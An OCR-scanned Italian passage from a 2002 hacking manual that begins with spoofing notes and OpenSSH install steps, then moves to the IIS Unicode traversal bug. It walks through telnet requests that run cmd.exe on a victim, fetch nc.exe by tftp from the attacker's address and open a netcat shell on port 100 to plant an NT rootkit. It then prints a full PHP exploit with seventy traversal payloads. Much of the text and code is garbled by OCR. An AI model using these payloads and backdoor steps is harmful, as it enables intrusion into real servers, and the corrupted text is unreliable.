IP address spoofing dove l'host attaccante finge di essere uno affidabile inviando 
pacchetti con l'indirizzo di questo. 
DNS spoofing di server DNS fidati. 
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SSH può essere usata per loggarsi in modo sicuro su un altro computer in una rete, eseguire 

comandi sul sistema remoto, e copiare file da una macchina all'altra. 

SSH fornisce comunicazioni e autenticazioni sicure su canali che non lo sono. 

Dovrebbe essere usata come rimpiazzo per rlogin, rsh, and rcp. In aggiunta a ciò, SSH 

fornisce connessioni protezione per le connessioni X1 1 e per l'inoltro dei pacchetti di quelle 

TCP. 

• Supporta sistemi di autenticazione fortemente protetti come RSA, SecurID, S/Key, 
Kerberos e TIS (così come la consueta procedura UNIX di username/password). 

• Esistono tre sistemi di sicurezza: shosts, rhosts compatibile e RSA. RSA è la più 
sicura (usa un sistema a chiave pubblica/privata per identificare le connessioni), ma 
scavalca l'autenticazione username/password di UNIX. 

• Il server SSH gira su UNIX, Linux e VAX. 

I Client girano su questi, e anche su Windows e molte altre piattaforme. 

• La compressione dei dati può essere attivata per migliorare le prestazioni su reti 
lente. 

• Proxy Internet SSH: 

o Non conosco di nessun proxy SSH funzionante: Magosanyi Arpad ha iniziato 
a lavorare su uno basato su OpenSSH (se ne parla sulla lista degli 
sviluppatori di OpenSSH, il messaggio è datato 13 gennaio 2000 17:10:05), 
ma non l'ha ancora terminato. 

o SSH può essere compilato in modo che possa attraversare i proxy SOCKS. 
SOCKS è un protocollo generale per i proxy, inizialmente sostenuto da NEC, 
ma disponibile ora presso molti altri fornitori. 

SSH1 per UNIX è disponibile come prodotto gratuito o commerciale (di DataFellows ). 
E'possibile scaricare una versione dimostrativa per scopi educativi da : 

http://www.ssh.org/download.html 



Il sito della DataFollows invece è a : 



http://wwwdatafellows.com 

Il server ha un file di configurazione file /etc/sshd_config, il client legge la configurazione da 
/etc/ssh_config, che contiene settaggi di default a livello di sistema. 

La configurazione di questo file può essere scavalcata da file di configurazione specifici di 
ogni utente (nella directory -user/.ssh). 

Server: configurate il demone ssh in modo che l'accesso sia limitato agli host specificati per 
nome e con chiavi pubbliche note (/etc/ssh_known_hosts) e l'autenticazione rhosts sia 
disabilitata. 

Installiamo OpenSSH in /usr/{bin,sbin,man}, con i file di configurazione in /etc/ssh, che sono 
le directory usate dall'installazione binaria RPM di RH6.1 . 

Suse Linux 6.3: 

• Notate che la Suse 6.3 ha SSH1 già installata in /usr e ciò crea conflitti con 
l'installazione di OpenSSH. Quindi rimuovete il pacchetto (assicuratevi si essere 
connessi su una linea seriale in quanto tutte le connessione SSH potrebbero 
interrompersi): 

rpm -erase ssh-1 .2.27-41 

• Non ci sono RPM binari, e i source RPM non funzionano facilmente, per cui 
compilate e installate direttamente dai sorgenti: 

zcat openssl-0.9.3.tar.gz | tar xf -; ed openssl-0.9.3; 
./config; 

make && make instali; 

zcat openssh-1_2_2_tar.gz |tar xf -; ed openssh-1 .2.2; 

./configure -prefix=/usr -sysconfdir=/etc/ssh -without-pam -with-tep-wrappers 

make && make instali; 

• Generate una chiave per l'host: ssh-keygen -b 1 024 -f /etc/ssh/ssh_host_key -N " 
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• Lanciate il demone: /usr/sbin/sshd 
Red Hat 6.1 su SPARC: 

• Non ci sono RPM binari disponibili per SPARC, quindi costruiteli dai sorgenti. Il 
sistema su cui ho testato la compilazione è una RH 6.1 "installazione server" vergine 
su SPARC4. 

• Più semplicemente, scaricate i sorgenti SSL [0] e lasciate perdere gli RPM (che 
richiedono un po' di smanettamento per funzionare su SPARC): 

zcat openssl-0.9.3.tar.gz | tar xf - ; ed openssl-0.9.3; 
./config; 

make && make instali; 

• Allo stesso modo compilate ssh dai sorgenti: 

zcat openssh-1_2_2_tar.gz |tar xf -; ed openssh-1 .2.2; 

./configure -prefix=/usr -sysconfdir=/etc/ssh -without-pam -with-tep-wrappers 

make && make instali 

• Generate una chiave per l'host: ssh-keygen -b 1 024 -f /etc/ssh/ssh_host_key -N " 

• Lanciate il demone: /usr/sbin/sshd 

Red Hat 6.1 su Intel Ì386: 

• Qui la cosa è abbastanza semplice perché esistono gli RPM binari. Sia SSH Server 
che gli RPM dei client sono dosponibili nei mirror di OpenSSH, che viene installato in 
/usr/{bin,sbin,man}, con i file di configurazione in /etc/ssh/. Questi RPM sono 
progettati per la 6.1 con aggiunti solo gli aggiornamenti di sicurezza. Scaricate e 
installate i pacchetti: 

rpm -i openssl-0_9_4-3_i386.rpm 
rpm -i openssh-1. 2.2-1. Ì386. rpm 
rpm -i openssh-server-1 .2.2-1 .i386.rpm 
rpm -i openssh-clients-1 .2.2-1 .i386.rpm 

Lanciate il demone: 
/usr/sbin/sshd 

• Un'installazione su RH6.0, ha comportato problemi con gli RPM, in questo caso 
conviene installare dai sorgenti come visto sopra per RH SPARC e Suse. 

Problemi: 

• Problemi: contrariamente alle altre varianti per Linux testate qui, quella per SPARC 
non funziona bene.: checksum non corretti vengono riportati sia per il client SSH1 
che per MindtermSSH. 

• I test sono stati positivi tra SSH1 , OpenSSH e Mindterm SSH su tutti i sistemi tranne 
RH SPARC, con l'eccezione di "sep" con MindtermSSH. sep di altri client come SSH1 
funziona invece correttamente. 



(1) Unicode Bug 

(2) Tra i vari metodi per riuscire ad accedere ai servers che utilizzano MS c'è quello 
definito con il termine di UNICODE BUG. 

(3) Esiste una associazione definita Rain Forest Puppy (RFP) il cui scopo è quello di 
esporre tutte le vulnerabilità dei computer. 

(4) L'unicode bug è stato testato e descritto da questa associazione la quale ha condotto 
una serie di test utilizzando diversi metodi. 

(5) Quello che è scaturito è che la rappresentazione lunga dei caratteri '/' e 'V usati 
normalmente nella definizione dei percorsi dei sistemi e precisamente %c0%af e %c1%9c 
creano in alcuni casi dei problemi quando software come MS cercano di decodificarli. 
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(6) Il sistema ISO/IEC ha infatti definito un set di caratteri multi-ottetto in grado di 
rappresentare set di caratteri non possibili nello standard ANSI. 

(7) Lo standard UTF-8 descrive la traslazione di formato dal codice ASCII considerato 
single-octet a quello multi-octet. 

(8) I caratteri la cui codifica è minore o uguale a 7bits rimane invariato in quanto gli viene 
semplicemente appeso uno 0 (Oxxxxxxx). 

(9) Ad esempio la lettera A che è rappresentata da 41 in esadecimale viene visualizzata 
in binario con 1000001. 

(1 0) In UTF-8 diventa soltanto 01 000001 . 

(11) UTF-8 dice invece che I caratteri rappresentati con meno di 12 bits ma maggiore di 
7 bits viene rappresentato come 1 1 0xxxxx 1 0xxxxxx. 

(12) Se un carattere possiede un valore esadecimale di 10F, avraà un valore binario di 
100001111. 

(13) 100001111 è lungo 9 bits. 

(14) In UTF-8's la rappresentazione sarà "11000100 10001111" binary o "C4 8F" in 
esadecaimale. 

(15) Questo numero è ottenuto aggiungendo i bits seguendo le regole dettate da UTF-8. 

(1 6) Aggiungendo 1 00001 111 in 1 1 0xxxxx 1 0xxxxxx e riempendo I valori blank (x) con 0. 
(17) 

llOxxxxx lOxxxxxx B UTF-8 Rule far 7 to 12 Bits 

+ 100 OOllll Si Binary valile of Hexadecimal character 10F 

HOxxlOO 10001111 B Result of the two values added together (less padding of Os) 

11000100 10001111 B Results of two values added together w/Os 

C4 8F B Hexadecimal value 

(18) 

(19) Un sommario della rappresentazione dei caratteri con UTF-8 è il seguente. 
(20) 

(21) 00-07 bits Oxxxxxxx 

08-11 bits llOxxxxx lOxxxxxx 

12-16 bits lllOxxxx lOxxxxxx lOxxxxxx 

17-21 bits llllOxxx lOxxxxxx lOxxxxxx lOxxxxxx 

(22) 

(23) Usando tali regole di composizione avremmo che usando telnet inviare 

"%47%45%54 %57%57%57" sarebbe come usare "GET WWW." 

(24) 

(25) Quando viene installato INTERNET INFORMATION SERVER atto a gestire I WEB 
servers in Windows il sistema crea un certo numero di directory di default come ad esempio : 
(26) 

(27) "C:\inetpub" 
(28) 

(29) e 
(30) 

(31) "C:\inetpub\wwwroot" 
(32) 

(33) Generalmente quando su una linea di comando passata a MS viene specificato un 
percorso viene controllato che questo non corrisponda a una di queste directory di sistema. 

(34) Il problema di MS usando l'UNICODE è dovuto al fatto che questo decodifica 
%C1%81 come lettera A eseguendo la decodifica solo dopo che è stato controllato il 
percorso. 

In una linea di comando come quella che segue i significati sono quelli a seguito. 

"http://ww.vuIneraJbIe.coni/flisadc/. .%c0%af. ./. .%c0%af. ./. .%c0%af. . /win 
nt/system32/cmd.exs?/c+dir+. . \ . . \ . . \ . . \ " 

"/msadc/" 

Representa il punto di partenza per la navigazione. Molte delle installazioni MS sono 
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configurate per puntare a questa directory loa quale è localizzata in "C:\Program 
Files\Common files\msadc." 

"..%cO%af/" 

Representa il primo path relativo a "C:\Program Files\Common Files\msadc"; questo path è 
"C:\Program Files\Common Files. 

"..%cO%af/" 

Representa il secondo path relativo da "C:\Program Files\Common Files\msdac"; il path è 
"C:\Program Files" 

"/winnt/system32/cmd.exe?" 

Representa il comando che si intende eseguire 

"c+dir+..\..\..\" 

Rappresenta il parametro che deve essere eseguito. 

(35) Prima di vedere un programma intero atto a utilizzare questo bug vediamo come 
potremmo provare a mano di inserire dentro ad un server una BACKDOOR. 

(36) Per prima cosa andate al capitolo dove viene descritto NETCAT e compilatelo. 

(37) Con COPERNIC cercate sulla rete NT ROOTKIT il quale contiene i seguenti file 
mostrati nell'immagine. 

(38) 



(39) 



g:\Nt uootkitO . 40 . zip\ * . * 


Nome 


Est . 


Dimena. 4* Data/ Ora 


[ ■ ■ ] 

uoot ueadrne 
B root 
S deploy 


txt 
sys 
Exe 


<DIR> 20/02/2002 10.18 
4.828 25/07/2001 13.38 
197.904 25/07/2001 12.40 
155.699 14/12/1999 06.07 



(41) Rootkit è stato anche lui visto precedentemente in ogni caso solo al fine di 
rinfrescarsi la memoria voglio ricordare che il programma installato sul sistema della vittima 
risponde su un determinato IP. 

(42) I processi che iniziano con ROOT vengono mantenuti nascosti come allo stesso 

modo le directory e i files. 

(43) Anche le chiavi di registro che iniziano con i sei caratteri _root_ vengono mantenute 
nascoste. 

(44) Per prima cosa proviamo a creare sul sistema remoto un file qualsiasi per vedere se 
questo è predisposto a questo tipo di attacco. 

(45) Lanciamo telnet agganciandolo alla porta HTT ovvero alla 80 con : 
(46) 

(47) $ telnet 192.168.222.1 80 

(48) Trying 192.168.222.1 

(49) Connected to 192.168.222.1 

(50) Escare character is ,A J' . 
(51) 

(52) Ora digitiamo : 
(53) 

(54) GET /scripts/. . %cl%9c. . /w±nnt/system32/cmd. exe?/c+echo+test+message+>test .msg 

(55) 

(56) Dopo l'invio riceveremo : 
(57) 

(58) HTTP/1.1 200 OK 

(59) Server: Microsoft-IIS/4 . 0 

(60) Date: Fri, 18 Jan 2002 19:00:30 GMT 

(61) Content-Length : 0 

(62) Content-Type : text/plain 
(63) 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



(64) Connection closed by foreign host . 

(65) 

(66) Ora per essere sicuri del successo di questo metodo possiamo allo stesso modo 

richiedere al sistema remoto di eseguire un TYPE del file di testo creato. 

(67) 

$ telnet 192.168.222.1 80 
Trying 192 .168 .222 .1 
Connected to 192 .168 .222 .1 
Escare character is ,A J' . 



GET /scripts/ . .%cl%9c. . /winnt/system32/cmd.exe?/c+type+test .msg 

HTTP/1.1 200 OK 

Server : Mi eroso ft -US/ 4 . 0 

Date: Fri, 18 Jan 2002 19:00:30 GMT 

Con tent-Length : 0 

Content-Type : text/plain 

Test message 

Connection closed by foreign host . 



(68) 
(69) 
(70) 
(71) 
(72) 
(73) 
(74) 
(75) 
(76) 
(77) 
(78) 
(79) 
(80) 
(81) 
(82) 
(83) 
(84) 

(85) Come potete vedere dalla penultima linea, se il metodo funziona vedremo il testo 
scritto dentro al file di testo. 

(86) Se il tutto è funzionato allora possiamo passare alla fase vera e propria ovvero quella 
in cui mediante l'esecuzione di un comando con CMD.EXE situato sul server remoto 
richiederemo di aprire una connessione TFTP in modo tale da uplodare il sistema della 
backdoor. 

(87) 

(88) Sempre allo stesso modo attiviamo con TELNET richiedendo la connessione ad un 

IP sulla porta 80. 

(89) 

(90) $ telnet 192.168.222.1 80 

(91) Trying 192.168.222.1 

(92) Connected to 192.168.222.1 

(93) Escare character is ,A J' . 
(94) 

(95) GET /scripts/. .%cl%9c. ./winnt/system32/cmd.exe?/c+tftp+- 

I+xxx . xxx . xxx . xxx+GET+nc . exe 

(96) 

(97) HTTP/1.1 200 OK 

(98) Server: Microsoft-US/ 4 . 0 

(99) Date: Fri, 18 Jan 2002 19:00:30 GMT 

(100) Content-Length : 0 

(101) Content-Type: text/plain 
(102) 

(103) Connection closed by foreign host. 

(104) 

(105) Chiaramente xxx.xxx.xxx.xxx è l'IP del nostro sistema su cui abbiano NC.EXE creato 
da sorgenti presenti su questo volume. 

(106) Ora ripetiamo la stessa procedura due volte per trasferire DEPLOY.EXE e 
_ROOT_.SYS 

(107) Dopo aver inserito i programmi sul sistema remoto a questo punto eseguiamoli 
aprendo un shell su questo. 

(1 08) A questo punto la connessione con TELNET avviene sulla porta 1 00. 

(109) La stringa GET è ora : 
(110) 

(111) GET /scripts/ . .%cl%9c. . /winnt/system32/cmd. exe?/c+nc . exei-l+-p+100+-t+- 
e+cmd. exe 

(112) 

(1 1 3) Ora il sistema remoto attende solo che noi apriamo una connessione sulla porta 1 00. 
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(114) 

(115) $ telnet 192.168.222.1 100 

(116) Trying 192.168.222.1 

(117) Connected to 192.168.222.1 

(118) Escare character is ,A J'. 
(119) 

(120) Ed ecco il risultato : 
(121) 

(122) c:\w±nnt\system32\> 

(123) 

(124) Il seguente sorgente scritto in PHP costituisce l'exploit per i sistemi che sono sensibili 
a questo problema. 

(125) L'uso di un sorgente in PHP può risultare utile nel qual caso non si disponga della 
possibilità di compilare uno degli exploits scritti in linguaggio C. 

(1 26) Le stringhe che vedete nella testata definite dentro ad un array sono di fatto quelle 
che vengono usate sul sistema WEB. 

(127) 
(128) 

§!php -q 

<? 

$vector_ataque[0] = " /msadc/. .%255c. ./. .%255c. ./. .%255c. . /winnt /system32/ cmd. exe?/c+" ; 
$vector_ataque [1] = " /msadc/ . .%25%35%63. ./. .%25%35%63. ./. .%25%35%63. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque [2] = " /msadc/ . . %255c. . %255c. . %255c. . %255cwinnt/systBm32/cmd. exe?/c+"; 
$vector_ataque [3] =" /msadc/ . . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/c 
md. exe?/c+ "; 

$vector__ataque [4] =" /scripts/ . . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [5] = " /scripts/ . . %252f. . %252f. . %252f. . %252fwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [ 6] =" /scripts/ . . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [7] =" /msadc/ . .%255c. ./■ .%255c. ./. .%255c. . /winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [8] =" /msadc/ . . %%35c. ./. . %%35c. ./. . %%35c. . /winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [ 9] =" /msadc/ . . %%35%63. ./. . %%35%63. ./. . %%35%63. . /winnt/system32/cmd. exe?/ 
c+"; 

$vector_ataque [10] = " /msadc/. .%25%35%63. ./. .%25%35%63. ./. .%25%35%63. . /winnt/sysism32/cm 
d.exe?/c+" ; 

$vector__ataque [11] = " /MSADC/ . . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+"; 
$vector_ataque [12] =" /MSADC/ . . %%35c. . %%35c. . %%35c. . %%35cwinnt/system32/cmd. exe?/c+"; 
$vector_ataque [13] = " /MSADC/ . . %%35%63. . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd. exe? 
/c+"; 

$vector_ataque [14]=" /MSADC/ . . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/ 
cmd. exe?/c+ "; 

$vector_ataque [ 15] = " /_vti_bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . /winnt/system32/cmd 
.exe ?/c+ "; 

$vector_ataque [16] = "/_vti_bin/ . . %%35c. . %%35c. . %%35c. . %%35c. . %%35c. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque[17] = "/_vti_bin/. .%%35%63. .%%35%63. .%%35%63. .%%35%63. .%%35%63. ./winnt/sy 
st em32/cmd . exe ?/c+ " ; 

$vector_ataque [18] = "/_vti_bin/ . . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. 
. / winnt / system32 / cmd . exe ?/c+ "; 

$vector__ataque [19] = "/PBServer/ . .%255c. .%255c. . %255cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [20] ="/PBServer/ . .%%35c. .%%35c. . %%35cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [21] = " /PBServer/ . . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd . exe?/c+" ; 
$vector_ataque [22] ="/PBServer/ . . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/cmd. exe? 
/c+"; 

$vector_ataque [23] ="/Rpc/ . . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [24] = "/Rpc/ . . %%35c. . %%35c. . %%35cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [25] ="/Rpc/ . . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [26] = "/Rpc/ . .%25%35%63. .%25%35%63. . %25%35%63winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [27] = "/_vti_bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque [28] = "/_vti_bin/ . .%%35c. .%%35c. .%%35c. .%%35c. .%%35c. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque [29] = "/_vti_bin/ . .%%35%63. .%%35%63. .%%35%63. .%%35%63. .%%35%63. ./winnt/sy 
st em32/cmd . exe ?/c+ " ; 

$vector_ataque [30] = "/_vtiJbin/ . . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. 
. /winnt / system32 / cmd . exe ?/c+ " ; 

$vector_ataque [31] =" /samples/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/ 
cmd . exe ?/c+ " ; 
$vector_ataque [32] = "/ cgi- 

bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+"; 
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$vector_ataque [33] = " /llsadmpwd/ . . %252f. . %252f. . %252f. . %252f . . %252f. . %252fwinnt/system3 
2/cmd.exe?/c+"; 

$vector_ataque [34] = "Z_vti_cnfZ ■ . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinntZsystem32 
Zcmd . exe ?/c+ " ; 

$vector_ataque [35] =" ZadsamplesZ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system3 
2/cmd.exe?/c+ "; 

$vector_ataque [36] =" ZscriptsZ . .%C1%1C. .%C1%1C. .%C1%1C. . %Cl%lCwinntZsystem32Zcmd. exe?/c 

+ "; 

$vector_ataque [37] = " /scripts/ . . %C1%9C. . %C1%9C. . %C1%9C. . %Cl%9Cwinnt/system32/cmd.exe?/c 

+ "; 

$vector_atague[38] = " ZscriptsZ ■ . %CO%AF. . %CO%AF. . %CO%AF. . %C0%AFwinnt/system32/cmd. exe?/c 

+ "; 

$vector_ataque [39] = " ZscriptsZ ■ . %252f. . %252f. . %252f. . %252fwinnt/system32/cmd. exe?/c+" ; 

$vector_ataque [40] =" /scripts/ . . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 

$vector_ataque [41 ] = " /scripts/ . . %cl%lc. . /winnt / system32 / cmd . exe?/c+" ; 

$vector_ataque [42] =" /scripts/ . . %c0%9v. . /winnt/system32/cmd.exe?/c+" ; 

$vector_ataque [43] =" /scripts/ . . %cO%af. . /winnt /system32/ cmd . exe?/c+" ; 

$vector_ataque [44] = " /scripts/ . . %cO%qf. . /winnt /system32/ cmd . exe?/c+" ; 

$vector_ataque [45] =" /scripts/ . . %cl%8s. . /winnt /system32/ cmd . exe?/c+" ; 

$vector_ataque [46] =" /scripts/ . . %cl%9c. . /winnt /system32/ cmd. exe?/c+" ; 

$vector_ataque [47] = "/ scripts / . . %cl%pc. . /winnt/ 'system32Zcmd.exe? /c+" ' ; 

$vector_ataque [48] = " /msadc/ . .%cO%af. ./■ .icOiaf. ./. .%cO%af. . /winnt /system32/ cmd. exe?/ c+ 

n . 

r 

$vector_ataque [49] = "/_vti_bin/ . . %cO%af. ./. . %cO%af. ./. . %cO%af. . /winnt/system32/cmd. exe? 
/c+"; 

$vector_ataque [50] =" /scripts/ . . %cO%af. . /winnt/ system32Zcmd.exe? /c+" ; 

$vector_ataque [51] = " /scripts . . %cl%9c. . /winnt/ system32Zcmd.exe? /c+" ; 

$vector_ataque [52] =" /scripts/ . . %cl%pc. . /winnt/ system32Zcmd.exe? /c+" ; 

$vector_ataque [53] =" /scripts/ . . %c0%9v. . ZwinntZ system32Zcmd.exe? Zc+" ; 

$vector_ataque [54] =" Z scripts Z ■ ■ %cO%qf. . ZwinntZ system32Zcmd.exe? Zc+" ; 

$vector_ataque [55] =" ZscriptsZ ■ ■ %cl%8s. . ZwinntZ sy stem32Zcmd.exe? Zc+" ; 

$vector_ataque [56] = " / 'scripts Z '■ ■ %cl%lc. . ZwinntZ system32Zcmd.exe? Zc+" ; 

$vector_ataque [ 57 ]="Z scripts Z ■ ■ %cl%9c. . ZwinntZ system32Zcmd.exe? Zc+" ; 

$vector_ataque [58] = " ZscriptsZ ■ ■ %cl%af. . ZwinntZ system32Zcmd.exe? Zc+" ; 

$vector_ataque [59]=" ZscriptsZ ■ ■ %e0%80%af. . ZwinntZsystem32Zcmd. exe?Zc+" ; 

$vector_ataque [60] =" ZscriptsZ ■ ■ %f0%80%80%af . . ZwinntZ sy stem32Zcmd.exe? Zc+" ; 

$vector_ataque [61] =" ZscriptsZ ■ ■ %f8%80%80%80%af . . ZwinntZ sy stem32Zcmd.exe? Zc+" ; 

$vector_ataque [62] = " ZscriptsZ ■ ■ %fc%80%80%80%80%af. . ZwinntZ system32Z cmd . exe?Zc+" ; 

$vector_ataque[63]=" ZmsadcZ ■ .\%e0\%80\%af. ./• • \%e0\%80\%af . ./• • \%e0\%80\%af . . ZwinntZ sy 

st em32Zcmd . exe \ ?/c+ " ; 

$vector_ataque [ 64] = " Zcgi- 

hinZ . ■ %cO%af. . %cO%af. . %cO%af. . %c0%af. . %c0%af. . ZwinntZ sy stem32Zcmd.exe? Zc+" ; 
$vector_ataque[65] = "ZsamplesZ ■ ■ %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . ZwinntZ system32 
Z cmd . exe ?Zc+ " ; 

$vector_ataque [66] = " ZiisadmpwdZ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . ZwinntZsystem 
32 Z cmd . exe ?Zc+ " ; 

$vector_ataque [ 67] = " Z_vti_cnfZ ■ ■ %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . ZwinntZ system3 
2Zcmd.exe?Zc+" ; 

$vector_ataque [68] = " Z_vti_binZ ■ ■ %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . ZwinntZ system3 
2Z cmd . exe ?/ c+ "; 

$vector_ataque [69] =" ZadsamplesZ ■ ■ %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . ZwinntZsystem 
32 Z cmd . exe ?Zc+ " ; 

if(!isset ($argv[l])) 

{ 

echo 

"\n\n \n"; 

echo " (c) UNICODE exploit for US 5.0Z4.0 by BoloTron 

\n"; 

echo 

" \n\n"; 

echo "Usage of the wicked device :\n"; 

echo $argv[0]." -t www. victim.vic\n" ; 

echo $argv[0] . " -t www.victim.vic -p proxy : port\n" ; 

echo $argv[0]." www.victim.vic comand variant_number\n" ; 

echo $argv[0] . " -p proxy.port www.victim.vic comand 

variantnumber\n " ; 

echo "Options : \n "; 

echo "— t — > Test the vulnerability (Try known variants till find 

the good 
one) \n " ; 

echo "-p — > Attack through proxy\n" ; 

echo "\nUse Mode:\nl) Test the host and get the variants number in 

case 

vulnerability exists\n" ; 

echo "2) Attack with command and variants number (optionaly you can 

use 
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echo "Note : When you specify a command with spaces, replace spaces 
with low script \"_\" \«"; 

echo "and you must doublé the backslash \"\\\". \n 
Example" . $argv[0] . " —p proxy.prx: 3128 www.victima.com dire : \ \ \ \inetpub 49\n"; 

echo "Thanks to An-tonio for the proxy support . \n" ; 

echo "Bug discover by Anonymous Post .\n" ; 

echo "TYPE ".$argv[0]." spanish, for Spanish help.\n"; 

ì 

else 
{ 

if ($argv[l ] == "spanish ") 
{ 

echo 

"\n\n \ti"; 

echo " (c) Exploit UNICODE para US 5.0/4.0 por 

BoloTron \n"; 

echo 

n \n\n"; 

echo "Uso del artefacto maligno :\n" ; 

echo $argv[0]." —t www .vidima ,vic\n" ; 

echo $argv[0]." —t www.victima.vic —p proxy :puerto\n" ; 
echo $argv[0]." www.victima.vic comando n°_de_variante\n" ; 
echo $argv[0]." —p proxy :port www.victima.vic comand 
n° __de_yariante\n " ; 

echo "Opciones : \n "; 

echo "-t — > Testea la vulnerabilidad, prueba todas las 
variantes hasta encontrar una buena . \n "; 

echo "-p — > Ataque a traves de proxy\n " ; 

echo "\nModo de Empleo:\nl) Testear el host y anotar el 
numero de variante en caso de ser vulnerable\n" ; 

echo "2) Atacar especificando comando y n° de variante 
(opcionalmente puedes especificar un proxy)\n"; 

echo "Nota : Cuando se especifica un comando en el que hay 
espacios hay que sustituirlos por un guion bajo _ \n"; 

echo "y las contrabarras hay que ponerlas dobles . \nEjemplo : 
".$argv[0]." -p proxy.prx: 3128 www.victima.com dir_c : \ \ \ \inetpub 49\n" ; 

echo "Gracias a An-tonio por sus indicaciones en el soporte 

proxy. \n"; 

echo "Bug descubierto por aviso anonimo. \n"; 

exit; 

} 

if($argv[l]=="-t ") 
{ 

if ($argv[3]=="-p") 
{ 

for ($i=0; $i<70; $i++) 
{ 

$prox=explode ( " : ", $argv[4 ] ) ; 
$comando=" dir+c : \ \ " ; 

$fp = fsockopen($prox[0] , $prox[l]); 

if(!$fp) 

{ 

echo "Conection failed. . . \n "; 

} 

else 
{ 

fputs ($fp, "GET 

http : // " . $argv[2 ] . " " . $vector_ataque [$i ] . " " . $comando . " ; HTTP/1 . 0\n \n ") ; 





echo "Trying variant number ".$i." "; 
while(!feof($fp)) 




$resul=$resul . fgets ($fp, 128) ; 




if (ereg("<DIR>", $resul) ) 




echo " > Vulnerable! !\n"; 

exit; 




else 


: (\n"; 


echo " > NoT Vulnerable 



} 
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; 
; 

else 
{ 

for ($1=0; $i<70; 
{ 

$port=80; 
$comando="dir+c : \ \ "; 
$fp = fsockopen ($argv[2] , $port) ; 
lf(!$fp) 
{ 

echo "Conection failed. . .\n" ; 

} 

else 
{ 

fputs ($fp, "GET 
' . $vector_ataque [$i] . " " . $comando . " HTTP/1 . 0\n\n" ) ; 

echo "Trying variant number 
while ( ! feof ($fp) ) 
{ 



} 



$resul=$resul . fgets ($fp, 128) ; 

If (ereg("<DIR>", $resul) ) 
{ 

echo " > vulnerable ! ! \n " ; 

exit; 

} 

else 
{ 

echo " > No Vulnerable 



(\n"; 



} 

foiose ($fp) ; 

} 

} 

} 

else 
{ 

if($argv[l]=="-p") 
{ 

$prox=explode ( " : ", $argv[2 ] ) ; 

$port =$prox [1] ; 
$comando=ereg replace ( "_ ", "+ ", $argv[4 ] ) ; 
$fp = fsockopen ($prox [0] , $port) ; 

if(!$fp) 
{ 

echo "Conection failed.\n"; 

} 

else 
{ 

fputs ($fp, "GET 

http : // " . $argv[3 ] $vector_ataque [$argv[5 ]]."". Scornando . " ; HTTP/1 . 0\n\n" ) ; 

while (! feof ($fp) ) 
{ 

echo fgets ($fp, 128) ; 

} 

} 

foiose ($fp) ; 

} 

else 
{ 

$port=80; 

$comando=ereg_replace ( "_ ", "+ ", $argv[ 2] ) ; 
$fp = fsockopen ($argv[l] , $port) ; 
if(!$fp) 
{ 

echo "Conection failed. \n"; 

} 

else 
{ 

fputs ($fp, "GET 
" . $vector_ataque [ $argv[ 3] ] . " " . $comando . " HTTP/1 . 0\n \n ") ; 
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{ 

echo fgets ($fp, 128) ; 

} 

} 

fclose ($fp) ; 

} 

} 



} 

?> 

cut here 



Hphp -q 

<? 

$vector_ataque [0] = " /msadc/ . . %255c. ./. . %255c. ./■ ■ %255c. . /winnt/system32/cmd. exe?/c+" ; 

$vector__ataque [1] = " /msadc/ . . %25%35%63. ./. ■ %25%35%63. ./■ ■ %25%35%63. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque [2] = " /msadc/ . . %255c. . %255c. . %255c. . %255cwinnt/systsm32/cmd. exe?/c+"; 

$vector_ataque[3]="/msadc/. .%25%35%63. .%25%35%63. .%25%35%63. . %25%35%63winnt/system32/c 
md. exe?/c+ "; 

$vector_ataque [4] =" /scripts/ . . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 

$vector_ataque [5] = " /scripts/ . . %252f. . %252f. . %252f. . %252fwinnt/system32/cmd. exe?/c+" ; 

$vector_ataque [ 6]=" /scripts/ . . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 

$vector_ataque [7] =" /msadc/ . . %255c. ./■ ■ %255c. ./■ ■ %255c. . /winnt/system32/cmd. exe?/c+" ; 

$vector_ataque [8] =" /msadc/ . . %%35c. ./. . %%35c. ./. . %%35c. . /winnt/system32/cmd. exe?/c+" ; 

$vector__ataque [9] = " /msadc/ . . %%35%63. ./. . %%35%63. ./. . %%35%63. . /winnt/system32/cmd. exe?/ 
c+"; 

